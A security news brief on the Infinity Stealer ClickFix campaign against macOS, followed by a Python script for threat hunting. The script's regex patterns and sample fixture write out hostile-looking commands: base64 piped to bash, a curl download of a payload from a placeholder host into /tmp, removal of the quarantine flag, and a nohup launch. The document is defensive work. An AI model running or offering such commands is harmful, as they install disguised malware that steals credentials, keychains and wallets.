Infinity Stealer Grabs macOS Data via ClickFix Lures


What happened

Infinity Stealer grabs macOS data via ClickFix lures in a campaign that uses fake human verification pages to trick users into executing malicious code in Terminal. According to Malwarebytes, the attack begins on the domain update-check[.]com, which displays a fake Cloudflare verification prompt and instructs the user to paste a base64-obfuscated curl command into macOS Terminal. That command decodes a Bash script, writes a second-stage Nuitka loader to /tmp, removes the quarantine flag, executes it with nohup, passes command-and-control information through environment variables, and then deletes itself and closes Terminal. The final payload is Infinity Stealer, a Python-based infostealer compiled into a native macOS binary. Malwarebytes said it can take screenshots and steal browser credentials, macOS Keychain entries, cryptocurrency wallet data, and plaintext secrets in developer files such as .env.

Who is affected

The direct exposure affects macOS users who encounter the fake Cloudflare verification page and paste the supplied command into Terminal. The potential impact includes theft of credentials from Chromium-based browsers and Firefox, macOS Keychain data, cryptocurrency wallets, screenshots, and plaintext developer secrets.

Why CISOs should care

This matters because the reported attack uses user-driven execution to bypass OS-level defenses and then steals multiple categories of high-value data from macOS systems. It is also notable because Malwarebytes described it as the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.

3 practical actions

Block the delivery path: Block access to update-check[.]com and investigate whether users were exposed to fake Cloudflare verification pages tied to this campaign.

Hunt for the execution chain: Review macOS systems for Terminal-driven execution of obfuscated curl commands, Bash scripts writing payloads to /tmp, quarantine flag removal, and nohup-launched binaries.

Scope for the named data types: Treat affected hosts as potentially exposed for browser credentials, macOS Keychain entries, cryptocurrency wallets, screenshots, and plaintext secrets in files such as .env.
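The "hunt for the execution chain" action above can be turned into a simple session-level triage rule. The following is an added example, not code from Malwarebytes or the original article: it scores macOS process command lines against the chain the article describes (base64-decoded command piped to a shell, payload written to /tmp, quarantine flag removal, nohup launch from /tmp) and flags a session only when several distinct steps appear together, which keeps a lone `curl -o /tmp/...` from paging anyone. The log format, session ids and sample command lines are constructed.

```python
import re
from collections import defaultdict

# Heuristic indicators for the ClickFix-style macOS execution chain described above.
# Patterns are deliberately coarse; tune them against your own process-event baseline.
INDICATORS = {
    "decode_piped_to_shell":   re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "curl_piped_to_shell":     re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b"),
    "payload_written_to_tmp":  re.compile(r"(>|\s-o\s*)/tmp/\S+"),
    "quarantine_flag_removed": re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine|\s-c\b)"),
    "nohup_launch_from_tmp":   re.compile(r"\bnohup\s+/tmp/\S+"),
}

def indicators_for(command: str) -> set[str]:
    """Return the names of every indicator a single command line matches."""
    return {name for name, rx in INDICATORS.items() if rx.search(command)}

def triage_sessions(events, min_distinct: int = 3):
    """Group process events by session and flag sessions whose commands together
    hit at least `min_distinct` different indicators.
    `events` is an iterable of (session_id, command_line) pairs."""
    per_session = defaultdict(set)
    for session_id, command in events:
        per_session[session_id] |= indicators_for(command)
    return {sid: sorted(hits) for sid, hits in per_session.items() if len(hits) >= min_distinct}

# Constructed sample events (not real telemetry): one ordinary developer session
# and one session that resembles the chain described in the article. The blob and
# domain are placeholders, not values from the campaign.
SAMPLE_EVENTS = [
    ("tty001", "git pull --rebase"),
    ("tty001", "curl -fsSL https://example.org/release.tar.gz -o ~/Downloads/release.tar.gz"),
    ("tty001", "tar xzf ~/Downloads/release.tar.gz"),
    ("tty002", "echo <OBFUSCATED_BLOB> | base64 -d | bash"),
    ("tty002", "curl -fsSL https://PLACEHOLDER_DOMAIN/stage2 -o /tmp/.loader"),
    ("tty002", "xattr -d com.apple.quarantine /tmp/.loader"),
    ("tty002", "nohup /tmp/.loader >/dev/null 2>&1 &"),
]

if __name__ == "__main__":
    for sid, hits in triage_sessions(SAMPLE_EVENTS).items():
        print(f"{sid}: {', '.join(hits)}")
```

Feed it (session, command) pairs from your EDR's process telemetry or from shell history; the benign session above scores zero while the suspicious one trips four distinct indicators.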
